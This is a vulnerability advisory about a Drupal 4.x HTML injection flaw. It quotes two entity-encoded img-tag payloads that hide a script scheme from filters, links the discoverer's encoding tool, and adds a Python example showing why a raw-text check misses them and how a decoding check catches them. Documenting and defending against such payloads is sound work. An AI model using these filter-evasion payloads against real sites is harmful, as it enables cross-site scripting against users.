

Title Drupal URL-Encoded Input HTML Injection Vulnerability
Published 2006-01-01-12:00AM
Updated 2006-01-02-08:45PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to liz0@bsdmail.com.
Vulnerable  Drupal Drupal 4.6.5
Drupal Drupal 4.6.4
Drupal Drupal 4.6.3
Drupal Drupal 4.6.2
Drupal Drupal 4.6.1
Drupal Drupal 4.6
Drupal Drupal 4.5.7
Drupal Drupal 4.5.6
Drupal Drupal 4.5.5
Drupal Drupal 4.5.4
Drupal Drupal 4.5.3
Debian Linux 3.1
Debian Linux 3.1 alpha
Debian Linux 3.1 arm
Debian Linux 3.1 hppa
Debian Linux 3.1 ia32
Debian Linux 3.1 ia64
Debian Linux 3.1 m68k
Debian Linux 3.1 mips
Debian Linux 3.1 mipsel
Debian Linux 3.1 ppc
Debian Linux 3.1 s/390
Debian Linux 3.1 sparc
Drupal Drupal 4.5.2
Drupal Drupal 4.5.1
Drupal Drupal 4.5
Drupal Drupal 4.4.3
Drupal Drupal 4.4.2
Drupal Drupal 4.4.1
Drupal Drupal 4.4
Drupal Drupal 4.2.0 RC
Drupal Drupal 4.1.0
Drupal Drupal 4.0.0
Not Vulnerable  
Code   The following URL-encoded examples were provided:

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


The discoverer has also provided an online tool to encode various strings at the following location:

http://liz0zim.no-ip.org/code.php
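
The two examples above spell the scheme of the src value as decimal and hexadecimal character references without trailing semicolons, so a check that searches the raw attribute text for the scheme does not see it. The following is an added example, not code from the advisory or from Drupal: it sets that weak check beside one that decodes the references first. The function names and the scheme allowlist are assumptions made for the example.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}  # assumption: allowlist chosen for this example

# Sample inputs: the src values of the two examples quoted on this page.
DEC_SRC = ("&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108"
           "&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41")
HEX_SRC = ("&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C"
           "&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29")

# Whitespace and control characters are dropped before the scheme is read
# (conservative: this strips more than a browser's URL parser would).
_STRIP = re.compile(r"[\x00-\x20\x7f]+")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def naive_is_safe(attr_value):
    """Weak check: looks for the scheme in the raw, still-encoded text."""
    return "javascript:" not in attr_value.lower()


def decoded_scheme(attr_value):
    """Return the URL scheme present after decoding, or None for a relative URL."""
    # html.unescape resolves decimal and hex references with or without ';'.
    text = html.unescape(attr_value)
    text = _STRIP.sub("", text).lower()
    match = _SCHEME.match(text)
    return match.group(1) if match else None


def is_safe_src(attr_value):
    """Hardened check: decode first, then allow relative URLs or listed schemes."""
    scheme = decoded_scheme(attr_value)
    return scheme is None or scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    samples = (("decimal", DEC_SRC), ("hex", HEX_SRC), ("plain", "images/logo.png"))
    for label, value in samples:
        print(label, "naive:", naive_is_safe(value),
              "hardened:", is_safe_src(value), "scheme:", decoded_scheme(value))
```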